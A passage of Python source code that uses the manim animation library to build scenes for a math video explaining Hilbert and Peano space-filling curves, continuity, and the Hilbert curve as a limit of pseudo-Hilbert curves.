Arrow(2*p, 4*p)
for theta in np.arange(np.pi/6, 2*np.pi, np.pi/3)
for p in [rotate_vector(RIGHT, theta)]
])
self.add(grid)
self.wait()
self.play(Transform(grid, space_mobject, run_time = 5))
self.remove(grid)
self.set_color_region(space_region, DARK_GREY)
self.wait()
self.add(infinitely, detailed)
self.wait()
self.play(DelayByOrder(Transform(detailed, extending)))
self.play(ShowCreation(arrows))
self.wait()
self.clear()
self.set_color_region(space_region, DARK_GREY)
self.play(ShowCreation(line))
self.play(Transform(line, curve, run_time = 5))
class HistoryOfDiscover(Scene):
def construct(self):
time_line = get_time_line()
time_line.shift(-time_line.number_to_point(1900))
hilbert_curve = HilbertCurve(order = 3)
peano_curve = PeanoCurve(order = 2)
for curve in hilbert_curve, peano_curve:
curve.scale(0.5)
hilbert_curve.to_corner(DOWN+RIGHT)
peano_curve.to_corner(UP+LEFT)
squares = Mobject(*[
Square(side_length=3, color=WHITE).replace(curve)
for curve in (hilbert_curve, peano_curve)
])
self.add(time_line)
self.wait()
for year, curve, vect, text in [
(1890, peano_curve, UP, "Peano Curve"),
(1891, hilbert_curve, DOWN, "Hilbert Curve"),
]:
point = time_line.number_to_point(year)
point[1] = 0.2
arrow = Arrow(point+2*vect, point, buff = 0.1)
arrow.set_color_by_gradient(curve.start_color, curve.end_color)
year_mob = TexMobject(str(year))
year_mob.next_to(arrow, vect)
words = TextMobject(text)
words.next_to(year_mob, vect)
self.play(
ShowCreation(arrow),
ShimmerIn(year_mob),
ShimmerIn(words)
)
self.play(ShowCreation(curve))
self.wait()
self.play(ShowCreation(squares))
self.wait()
self.play(ApplyMethod(
Mobject(*self.mobjects).shift, 20*(DOWN+RIGHT)
))
class DefinitionOfCurve(Scene):
def construct(self):
start_words = TextMobject([
"``", "Space Filling", "Curve ''",
]).to_edge(TOP, buff = 0.25)
quote, space_filling, curve_quote = start_words.copy().split()
curve_quote.shift(
space_filling.get_left()-\
curve_quote.get_left()
)
space_filling = Point(space_filling.get_center())
end_words = Mobject(*[
quote, space_filling, curve_quote
]).center().to_edge(TOP, buff = 0.25)
space_filling_fractal = TextMobject("""
``Space Filling Fractal''
""").to_edge(UP)
curve = HilbertCurve(order = 2).shift(DOWN)
fine_curve = HilbertCurve(order = 8)
fine_curve.replace(curve)
dots = Mobject(*[
Dot(
                curve.points[n*curve.get_num_points()//15],
color = YELLOW_C
)
for n in range(1, 15)
if n not in [4, 11]
])
start_words.shift(2*(UP+LEFT))
self.play(
ApplyMethod(start_words.shift, 2*(DOWN+RIGHT))
)
self.wait()
self.play(Transform(start_words, end_words))
self.wait()
self.play(ShowCreation(curve))
self.wait()
self.play(ShowCreation(
dots,
run_time = 3,
))
self.wait()
self.clear()
self.play(ShowCreation(fine_curve, run_time = 5))
self.wait()
self.play(ShimmerIn(space_filling_fractal))
self.wait()
class PseudoHilbertCurvesDontFillSpace(Scene):
def construct(self):
curve = HilbertCurve(order = 1)
grid = Grid(2, 2, stroke_width=1)
self.add(grid, curve)
for order in range(2, 6):
self.wait()
new_grid = Grid(2**order, 2**order, stroke_width=1)
self.play(
ShowCreation(new_grid),
Animation(curve)
)
self.remove(grid)
grid = new_grid
self.play(Transform(
curve, HilbertCurve(order = order)
))
square = Square(side_length = 6, color = WHITE)
square.corner = Mobject1D()
square.corner.add_line(3*DOWN, ORIGIN)
square.corner.add_line(ORIGIN, 3*RIGHT)
square.digest_mobject_attrs()
square.scale(2**(-5))
square.corner.set_color(
            Color(rgb = curve.rgbas[curve.get_num_points()//3])
)
square.shift(
grid.get_corner(UP+LEFT)-\
square.get_corner(UP+LEFT)
)
self.wait()
self.play(
FadeOut(grid),
FadeOut(curve),
FadeIn(square)
)
self.play(
ApplyMethod(square.replace, grid)
)
self.wait()
class HilbertCurveIsLimit(Scene):
def construct(self):
mathy, bubble = get_mathy_and_bubble()
bubble.write(
"A Hilbert curve is the \\\\ limit of all these \\dots"
)
self.add(mathy, bubble)
self.play(ShimmerIn(bubble.content))
self.wait()
class DefiningCurves(Scene):
def construct(self):
words = TextMobject(
["One does not simply define the limit \\\\ \
of a sequence of","curves","\\dots"]
)
top_words = TextMobject([
"curves", "are functions"
]).to_edge(UP)
curves1 = words.split()[1]
curves2 = top_words.split()[0]
words.ingest_submobjects()
number = TexMobject("0.27")
pair = TexMobject("(0.53, 0.02)")
pair.next_to(number, buff = 2)
arrow = Arrow(number, pair)
Mobject(number, arrow, pair).center().shift(UP)
number_line = UnitInterval()
number_line.stretch_to_fit_width(5)
number_line.to_edge(LEFT).shift(DOWN)
grid = Grid(4, 4).scale(0.4)
grid.next_to(number_line, buff = 2)
low_arrow = Arrow(number_line, grid)
self.play(ShimmerIn(words))
self.wait()
self.play(
FadeOut(words),
ApplyMethod(curves1.replace, curves2),
ShimmerIn(top_words.split()[1])
)
self.wait()
self.play(FadeIn(number))
self.play(ShowCreation(arrow))
self.play(FadeIn(pair))
self.wait()
self.play(ShowCreation(number_line))
self.play(ShowCreation(low_arrow))
self.play(ShowCreation(grid))
self.wait()
class PseudoHilbertCurveAsFunctionExample(Scene):
args_list = [(2,), (3,)]
# For subclasses to turn args in the above
# list into stings which can be appended to the name
@staticmethod
def args_to_string(order):
return "Order%d"%order
@staticmethod
def string_to_args(order_str):
return int(order_str)
def construct(self, order):
if order == 2:
result_tex = "(0.125, 0.75)"
elif order == 3:
result_tex = "(0.0758, 0.6875)"
phc, arg, result = TexMobject([
"\\text{PHC}_%d"%order,
"(0.3)",
"= %s"%result_tex
]).to_edge(UP).split()
function = TextMobject("Function", size = "\\normal")
function.shift(phc.get_center()+DOWN+2*LEFT)
function_arrow = Arrow(function, phc)
line = Line(5*LEFT, 5*RIGHT)
curve = HilbertCurve(order = order)
line.match_colors(curve)
grid = Grid(2**order, 2**order)
grid.fade()
for mob in curve, grid:
mob.scale(0.7)
index = int(0.3*line.get_num_points())
dot1 = Dot(line.points[index])
arrow1 = Arrow(arg, dot1, buff = 0.1)
dot2 = Dot(curve.points[index])
arrow2 = Arrow(result.get_bottom(), dot2, buff = 0.1)
self.add(phc)
self.play(
ShimmerIn(function),
ShowCreation(function_arrow)
)
self.wait()
self.remove(function_arrow, function)
self.play(ShowCreation(line))
self.wait()
self.play(
ShimmerIn(arg),
ShowCreation(arrow1),
ShowCreation(dot1)
)
self.wait()
self.remove(arrow1)
self.play(
FadeIn(grid),
Transform(line, curve),
Transform(dot1, dot2),
run_time = 2
)
self.wait()
self.play(
ShimmerIn(result),
ShowCreation(arrow2)
)
self.wait()
class ContinuityRequired(Scene):
def construct(self):
words = TextMobject([
"A function must be",
"\\emph{continuous}",
"if it is to represent a curve."
])
words.split()[1].set_color(YELLOW_C)
self.add(words)
self.wait()
class FormalDefinitionOfContinuity(Scene):
def construct(self):
self.setup()
self.label_spaces()
self.move_dot()
self.label_jump()
self.draw_circles()
self.vary_circle_sizes()
self.discontinuous_point()
def setup(self):
self.input_color = YELLOW_C
self.output_color = RED
def spiril(t):
theta = 2*np.pi*t
return t*np.cos(theta)*RIGHT+t*np.sin(theta)*UP
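        # spiril(t) traces one turn of an Archimedean spiral: the radius grows
        # linearly with t while the angle sweeps theta = 2*pi*t.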
self.spiril1 = ParametricFunction(
lambda t : 1.5*RIGHT + DOWN + 2*spiril(t),
density = 5*DEFAULT_POINT_DENSITY_1D,
)
self.spiril2 = ParametricFunction(
lambda t : 5.5*RIGHT + UP - 2*spiril(1-t),
density = 5*DEFAULT_POINT_DENSITY_1D,
)
Mobject.align_data(self.spiril1, self.spiril2)
self.output = Mobject(self.spiril1, self.spiril2)
self.output.ingest_submobjects()
self.output.set_color(GREEN_A)
self.interval = UnitInterval()
self.interval.set_width(FRAME_X_RADIUS-1)
self.interval.to_edge(LEFT)
self.input_dot = Dot(color = self.input_color)
self.output_dot = self.input_dot.copy().set_color(self.output_color)
left, right = self.interval.get_left(), self.interval.get_right()
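        # The homotopies below are driven by the animation parameter t in [0, 1]:
        # the input dot slides along the unit interval while the output dot
        # follows the corresponding point of the spiral output curve.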
self.input_homotopy = lambda x_y_z_t : (x_y_z_t[0], x_y_z_t[1], x_y_z_t[3]) + interpolate(left, right, x_y_z_t[3])
output_size = self.output.get_num_points()-1
output_points = self.output.points
self.output_homotopy = lambda x_y_z_t1 : (x_y_z_t1[0], x_y_z_t1[1], x_y_z_t1[2]) + output_points[int(x_y_z_t1[3]*output_size)]
def get_circles_and_points(self, min_input, max_input):
input_left, input_right = [
self.interval.number_to_point(num)
for num in (min_input, max_input)
]
input_circle = Circle(
radius = get_norm(input_left-input_right)/2,
color = WHITE
)
input_circle.shift((input_left+input_right)/2)
input_points = Line(
input_left, input_right,
color = self.input_color
)
output_points = Mobject(color = self.output_color)
n = self.output.get_num_points()
output_points.add_points(
self.output.points[int(min_input*n):int(max_input*n)]
)
output_center = output_points.points[int(0.5*output_points.get_num_points())]
max_distance = get_norm(output_center-output_points.points[-1])
output_circle = Circle(
radius = max_distance,
color = WHITE
)
output_circle.shift(output_center)
return (
input_circle,
input_points,
output_circle,
output_points
)
def label_spaces(self):
input_space = TextMobject("Input Space")
input_space.to_edge(UP)
input_space.shift(LEFT*FRAME_X_RADIUS/2)
output_space = TextMobject("Output Space")
output_space.to_edge(UP)
output_space.shift(RIGHT*FRAME_X_RADIUS/2)
line = Line(
UP*FRAME_Y_RADIUS, DOWN*FRAME_Y_RADIUS,
color = WHITE
)
self.play(
ShimmerIn(input_space),
ShimmerIn(output_space),
ShowCreation(line),
ShowCreation(self.interval),
)
self.wait()
def move_dot(self):
kwargs = {
"rate_func" : None,
"run_time" : 3
}
self.play(
Homotopy(self.input_homotopy, self.input_dot, **kwargs),
Homotopy(self.output_homotopy, self.output_dot, **kwargs),
ShowCreation(self.output, **kwargs)
)
self.wait()
def label_jump(self):
jump_points = Mobject(
Point(self.spiril1.points[-1]),
Point(self.spiril2.points[0])
)
self.brace = Brace(jump_points, RIGHT)
self.jump = TextMobject("Jump")
self.jump.next_to(self.brace, RIGHT)
self.play(
GrowFromCenter(self.brace),
ShimmerIn(self.jump)
)
self.wait()
self.remove(self.brace, self.jump)
def draw_circles(self):
input_value = 0.45
input_radius = 0.04
for dot in self.input_dot, self.output_dot:
dot.center()
kwargs = {
"rate_func" : lambda t : interpolate(1, input_value, smooth(t))
}
self.play(
Homotopy(self.input_homotopy, self.input_dot, **kwargs),
Homotopy(self.output_homotopy, self.output_dot, **kwargs)
)
A, B = list(map(Mobject.get_center, [self.input_dot, self.output_dot]))
A_text = TextMobject("A")
A_text.shift(A+2*(LEFT+UP))
A_arrow = Arrow(
A_text, self.input_dot,
color = self.input_color
)
B_text = TextMobject("B")
B_text.shift(B+2*RIGHT+DOWN)
B_arrow = Arrow(
B_text, self.output_dot,
color = self.output_color
)
tup = self.get_circles_and_points(
input_value-input_radius,
input_value+input_radius
)
input_circle, input_points, output_circle, output_points = tup
for text, arrow in [(A_text, A_arrow), (B_text, B_arrow)]:
self.play(
ShimmerIn(text),
ShowCreation(arrow)
)
self.wait()
self.remove(A_text, A_arrow, B_text, B_arrow)
self.play(ShowCreation(input_circle))
self.wait()
self.play(ShowCreation(input_points))
self.wait()
input_points_copy = input_points.copy()
self.play(
Transform(input_points_copy, output_points),
run_time = 2
)
self.wait()
self.play(ShowCreation(output_circle))
self.wait()
self.wait()
self.remove(*[
input_circle, input_points,
output_circle, input_points_copy
])
def vary_circle_sizes(self):
input_value = 0.45
radius = 0.04
vary_circles = VaryCircles(
self, input_value, radius,
run_time = 5,
)
self.play(vary_circles)
self.wait()
text = TextMobject("Function is ``Continuous at A''")
text.shift(2*UP).to_edge(LEFT)
arrow = Arrow(text, self.input_dot)
self.play(
ShimmerIn(text),
ShowCreation(arrow)
)
self.wait()
self.remove(vary_circles.mobject, text, arrow)
def discontinuous_point(self):
point_description = TextMobject(
"Point where the function jumps"
)
point_description.shift(3*RIGHT)
discontinuous_at_A = TextMobject(
"``Discontinuous at A''",
size = "\\Large"
)
discontinuous_at_A.shift(2*UP).to_edge(LEFT)
text = TextMobject("""
            Circle around output \\\\
points can never \\\\
be smaller than \\\\
the jump
""")
text.scale(0.75)
text.shift(3.5*RIGHT)
input_value = 0.5
input_radius = 0.04
vary_circles = VaryCircles(
self, input_value, input_radius,
run_time = 5,
)
for dot in self.input_dot, self.output_dot:
dot.center()
kwargs = {
"rate_func" : lambda t : interpolate(0.45, input_value, smooth(t))
}
self.play(
Homotopy(self.input_homotopy, self.input_dot, **kwargs),
Homotopy(self.output_homotopy, self.output_dot, **kwargs)
)
discontinuous_arrow = Arrow(discontinuous_at_A, self.input_dot)
arrow = Arrow(
point_description, self.output_dot,
buff = 0.05,
color = self.output_color
)
self.play(
ShimmerIn(point_description),
ShowCreation(arrow)
)
self.wait()
self.remove(point_description, arrow)
tup = self.get_circles_and_points(
input_value-input_radius,
input_value+input_radius
)
input_circle, input_points, output_circle, output_points = tup
input_points_copy = input_points.copy()
self.play(ShowCreation(input_circle))
self.play(ShowCreation(input_points))
self.play(
Transform(input_points_copy, output_points),
run_time = 2
)
self.play(ShowCreation(output_circle))
self.wait()
self.play(ShimmerIn(text))
self.remove(input_circle, input_points, output_circle, input_points_copy)
self.play(vary_circles)
self.wait()
self.play(
ShimmerIn(discontinuous_at_A),
ShowCreation(discontinuous_arrow)
)
self.wait(3)
self.remove(vary_circles.mobject, discontinuous_at_A, discontinuous_arrow)
def continuous_point(self):
pass
class VaryCircles(Animation):
def __init__(self, scene, input_value, radius, **kwargs):
digest_locals(self)
Animation.__init__(self, Mobject(), **kwargs)
def interpolate_mobject(self, alpha):
radius = self.radius + 0.9*self.radius*np.sin(1.5*np.pi*alpha)
self.mobject = Mobject(*self.scene.get_circles_and_points(
self.input_value-radius,
self.input_value+radius
)).ingest_submobjects()
class FunctionIsContinuousText(Scene):
def construct(self):
all_points = TextMobject("$f$ is continuous at every input point")
continuous = TextMobject("$f$ is continuous")
all_points.shift(UP)
continuous.shift(DOWN)
arrow = Arrow(all_points, continuous)
self.play(ShimmerIn(all_points))
self.play(ShowCreation(arrow))
self.play(ShimmerIn(continuous))
self.wait()
class DefineActualHilbertCurveText(Scene):
def construct(self):
self.add(TextMobject("""
Finally define a Hilbert Curve\\dots
"""))
self.wait()
class ReliesOnWonderfulProperty(Scene):
def construct(self):
self.add(TextMobject("""
\\dots which relies on a certain property
of Pseudo-Hilbert-curves.
"""))
self.wait()
class WonderfulPropertyOfPseudoHilbertCurves(Scene):
def construct(self):
val = 0.3
text = TextMobject([
"PHC", "$_n", "(", "%3.1f"%val, ")$",
" has a ", "limit point ", "as $n \\to \\infty$"
])
func_parts = text.copy().split()[:5]
Mobject(*func_parts).center().to_edge(UP)
num_str, val_str = func_parts[1], func_parts[3]
curve = UnitInterval()
curve.sort_points(lambda p : p[0])
dot = Dot().shift(curve.number_to_point(val))
arrow = Arrow(val_str, dot, buff = 0.1)
curve.add_numbers(0, 1)
self.play(ShowCreation(curve))
self.play(
ShimmerIn(val_str),
ShowCreation(arrow),
ShowCreation(dot)
)
self.wait()
self.play(
FadeOut(arrow),
*[
FadeIn(func_parts[i])
for i in (0, 1, 2, 4)
]
)
for num in range(2,9):
new_curve = HilbertCurve(order = num)
new_curve.scale(0.8)
new_dot = Dot(new_curve.points[int(val*new_curve.get_num_points())])
new_num_str = TexMobject(str(num)).replace(num_str)
self.play(
Transform(curve, new_curve),
Transform(dot, new_dot),
Transform(num_str, new_num_str)
)
self.wait()
text.to_edge(UP)
text_parts = text.split()
for index in 1, -1:
text_parts[index].set_color()
starters = Mobject(*func_parts + [
Point(mob.get_center(), stroke_width=1)
for mob in text_parts[5:]
])
self.play(Transform(starters, text))
arrow = Arrow(text_parts[-2].get_bottom(), dot, buff = 0.1)
self.play(ShowCreation(arrow))
self.wait()
class FollowManyPoints(Scene):
def construct(self):
text = TextMobject([
"PHC", "_n", "(", "x", ")$",
" has a limit point ", "as $n \\to \\infty$",
"\\\\ for all $x$"
])
parts = text.split()
parts[-1].next_to(Mobject(*parts[:-1]), DOWN)
parts[-1].set_color(BLUE)
parts[3].set_color(BLUE)
parts[1].set_color()
parts[-2].set_color()
text.to_edge(UP)
curve = UnitInterval()
curve.sort_points(lambda p : p[0])
vals = np.arange(0.1, 1, 0.1)
dots = Mobject(*[
Dot(curve.number_to_point(val))
for val in vals
])
curve.add_numbers(0, 1)
starter_dots = dots.copy().ingest_submobjects()
starter_dots.shift(2*UP)
self.add(curve, text)
self.wait()
self.play(DelayByOrder(ApplyMethod(starter_dots.shift, 2*DOWN)))
self.wait()
self.remove(starter_dots)
self.add(dots)
for num in range(1, 10):
new_curve = HilbertCurve(order = num)
new_curve.scale(0.8)
new_dots = Mobject(*[
Dot(new_curve.points[int(val*new_curve.get_num_points())])
for val in vals
])
self.play(
Transform(curve, new_curve),
Transform(dots, new_dots),
)
# self.wait()
class FormalDefinitionOfHilbertCurve(Scene):
def construct(self):
val = 0.7
text = TexMobject([
"\\text{HC}(", "x", ")",
"=\\lim_{n \\to \\infty}\\text{PHC}_n(", "x", ")"
])
text.to_edge(UP)
x1 = text.split()[1]
x2 = text.split()[-2]
x2.set_color(BLUE)
explanation = TextMobject("Actual Hilbert curve function")
exp_arrow = Arrow(explanation, text.split()[0])
curve = UnitInterval()
dot = Dot(curve.number_to_point(val))
x_arrow = Arrow(x1.get_bottom(), dot, buff = 0)
curve.sort_points(lambda p : p[0])
curve.add_numbers(0, 1)
self.add(*text.split()[:3])
self.play(
ShimmerIn(explanation),
ShowCreation(exp_arrow)
)
self.wait()
self.remove(explanation, exp_arrow)
self.play(ShowCreation(curve))
self.play(
ApplyMethod(x1.set_color, BLUE),
ShowCreation(x_arrow),
ShowCreation(dot)
)
self.wait()
self.remove(x_arrow)
limit = Mobject(*text.split()[3:]).ingest_submobjects()
limit.stroke_width = 1
self.play(ShimmerIn(limit))
for num in range(1, 9):
new_curve = HilbertCurve(order = num)
new_curve.scale(0.8)
new_dot = Dot(new_curve.points[int(val*new_curve.get_num_points())])
self.play(
Transform(curve, new_curve),
Transform(dot, new_dot),
)
class CouldNotDefineForSnakeCurve(Scene):
def construct(self):
self.add(TextMobject("""
You could not define a limit curve from
snake curves.
"""))
self.wait()
class ThreeThingsToProve(Scene):
def construct(self):
definition = TexMobject([
"\\text{HC}(", "x", ")",
"=\\lim_{n \\to \\infty}\\text{PHC}_n(", "x", ")"
])
definition.to_edge(UP)
definition.split()[1].set_color(BLUE)
definition.split()[-2].set_color(BLUE)
intro = TextMobject("Three things need to be proven")
prove_that = TextMobject("Prove that HC is $\\dots$")
prove_that.scale(0.7)
prove_that.to_edge(LEFT)
items = TextMobject([
"\\begin{enumerate}",
"\\item Well-defined: ",
"Points on Pseudo-Hilbert-curves really do converge",
"\\item A Curve: ",
"HC is continuous",
"\\item Space-filling: ",
"Each point in the unit square is an output of HC",
"\\end{enumerate}",
]).split()
items[1].set_color(GREEN)
items[3].set_color(YELLOW_C)
items[5].set_color(MAROON)
Mobject(*items).to_edge(RIGHT)
self.add(definition)
self.play(ShimmerIn(intro))
self.wait()
self.play(Transform(intro, prove_that))
for item in items[1:-1]:
self.play(ShimmerIn(item))
self.wait()
class TilingSpace(Scene):
def construct(self):
coords_set = [ORIGIN]
for n in range(int(FRAME_WIDTH)):
for vect in UP, RIGHT:
for k in range(n):
new_coords = coords_set[-1]+((-1)**n)*vect
coords_set.append(new_coords)
square = Square(side_length = 1, color = WHITE)
squares = Mobject(*[
square.copy().shift(coords)
for coords in coords_set
]).ingest_submobjects()
self.play(
DelayByOrder(FadeIn(squares)),
run_time = 3
)
curve = HilbertCurve(order = 6).scale(1./6)
all_curves = Mobject(*[
curve.copy().shift(coords)
for coords in coords_set
]).ingest_submobjects()
all_curves.thin_out(10)
self.play(ShowCreation(
all_curves,
rate_func=linear,
run_time = 15
))
class ColorIntervals(Scene):
def construct(self):
number_line = NumberLine(
numerical_radius = 5,
number_at_center = 5,
leftmost_tick = 0,
density = 2*DEFAULT_POINT_DENSITY_1D
)
number_line.shift(2*RIGHT)
number_line.add_numbers()
number_line.scale(2)
brace = Brace(Mobject(
*number_line.submobjects[:2]
))
self.add(number_line)
for n in range(0, 10, 2):
if n == 0:
brace_anim = GrowFromCenter(brace)
else:
brace_anim = ApplyMethod(brace.shift, 2*RIGHT)
self.play(
ApplyMethod(
number_line.set_color,
RED,
lambda p : p[0] > n-6.2 and p[0] < n-4 and p[1] > -0.4
),
brace_anim
)
| 30.62312
| 134
| 0.555474
|